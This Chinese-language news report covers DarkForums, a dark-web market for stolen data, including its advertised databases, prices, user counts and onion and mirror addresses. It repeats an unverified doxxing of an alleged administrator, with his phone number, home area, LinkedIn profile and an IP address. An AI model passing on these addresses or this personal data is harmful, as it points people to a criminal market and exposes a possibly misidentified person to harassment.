“暗网下/AWX”曾经介绍，DarkForums是一个与BreachForums类似的暗网被盗数据交易论坛，在暗网与明网均可以访问，声称可以提供任何目标的多种类型数据。据观察，自从BreachForums销声匿迹后，DarkForums发展迅猛，已经拥有将近7.5万用户，逐渐取代BreachForums。 根据DarkForums对自己的宣传，其云端存储拥有来自欧洲、亚洲、非洲、美洲、澳大利亚等六大洲目标对象的各类数据，覆盖65+个国家，这些数据都是顶级品质，包括： ⭐️军事文件数据库 ⭐️企业完整数据库 ⭐️证件扫描件（身份证-驾照-护照） ⭐️消费者信息数据库 ⭐️电话号码数据库 ⭐️电子邮箱数据库 ⭐️外汇与加密货币数据库 ⭐️赌场及游戏数据库 ⭐️号码：密码 & 邮箱 & 用户名：密码 ⭐️公民身份号 & 社会安全号 & 税务号数据库 ⭐️大型网站数据库 ⭐️去哈希化数据及其他大型云端资源 DarkForums表示，其海量数据储备是未遭破坏的原始数据库，极度新鲜且私密，且支持用户自定义请求，有顶级品质保障。其全天候更新档案库，客服24/7全天候在线支持。 根据网站发布的套餐价格，1个月套餐售价200美元，3个月套餐售价为400美元，而终身套餐售价为1000美元，免费神级升级包含在3个月及终身套餐中。 DarkForums设置了三种类型的网站会员等级：VIP会员订阅价格为20欧元/999年，MVP会员订阅价格为40欧元/终身，GOD会员订阅价格为80欧元/终身。 根据公告，DarkForums提供的暗网V3域名为：http://qeei4m7a2tve6ityewnezvcnf647onsqbmdbmlcw4y5pr6uwwfwa35yd[.]onion 除了暗网地址外，该网站同步提供了几个明网镜像地址： https://df[.]hn https://df[.]kiwi https://darkforums[.]st 此外，该网站还拥有域名https://darkforums[.]me，页面显示该域名的所有者为Knox，同时显示了DarkForums的暗网与明网域名，但未作跳转。 根据DarkForums的统计数据，该暗网数据泄露论坛已经拥有超过2.5万的主题帖，近25万的回复帖，近7.5万的注册用户，最多同时在线人数接近2万，可见其人气非常旺，但不知能够坚持几日。 DarkForums称其余自称新BreachForums的论坛都是虚假的 在FBI查封域名BreachForums.hn后，DarkForums发布警告称，虽然互联网上已出现多个冒牌或克隆网站，自称是“新BreachForums”，但它们与原版BreachForums团队毫无关联，都是为了欺骗、钓鱼或窃取用户数据。而DarkForums才是目前该领域唯一活跃且合法的主要社区。 对于本站（anwangxia.com）曾经报道的一个由BreachForums前管理员Koko创建的“新BreachForums”，DarkForums在Telegram频道表示，这个BreachForums克隆站也不是正规站点，Koko是个智障骗子，以过往成就为幌子行骗。他不仅诈骗了克隆论坛所有者SEPTEMBER，更在其自家论坛实施诈骗，如今更冒用SEPTEMBER等名义兜售论坛基础设施行骗。多名社区成员反映购买其论坛时遭遇欺诈，所以请务必警惕并远离这类无赖之徒。 某Telegram频道揭露的DarkForums管理员身份未得到权威证实 近期，有国内公众号号称某Telegram频道揭露了DarkForums管理员（Lucifer、Knox）的真实身份。根据号称”开盒“信息，此人为印度人，真实姓名为”Hritik Kumbhar“，来自印度奥里萨邦（Bhubaneswar, Odisha, India），系NIST大学计算机科学学士，现为初创公司InnovexPlus创始人，具备Linux、Python、网络安全等技术背景。 泄露内容极为详尽，包括”Hritik Kumbhar“的家庭住址（Bolangir, Odisha 767001）、手机号码（+916370174459）、常用设备（三星Z Fold6/7、尼康D7200相机）、学校（NIST University）、Linkedin个人页面（https://in.linkedin.com/in/hritik-kumbhar-980174354）、多个邮箱（如[email protected]、[email protected]）及移动网络IP地址（136.233.58.227）等。 据“暗网下/AWX”综合各个权威网络安全威胁情报分析专家对DarkForums的分析，尚未证实”Hritik Kumbhar“是DarkForums管理员Knox，有待进一步的消息。 DarkForums后续如何发展，FBI会不会对其采取执法行动，“暗网下/AWX”将持续关注。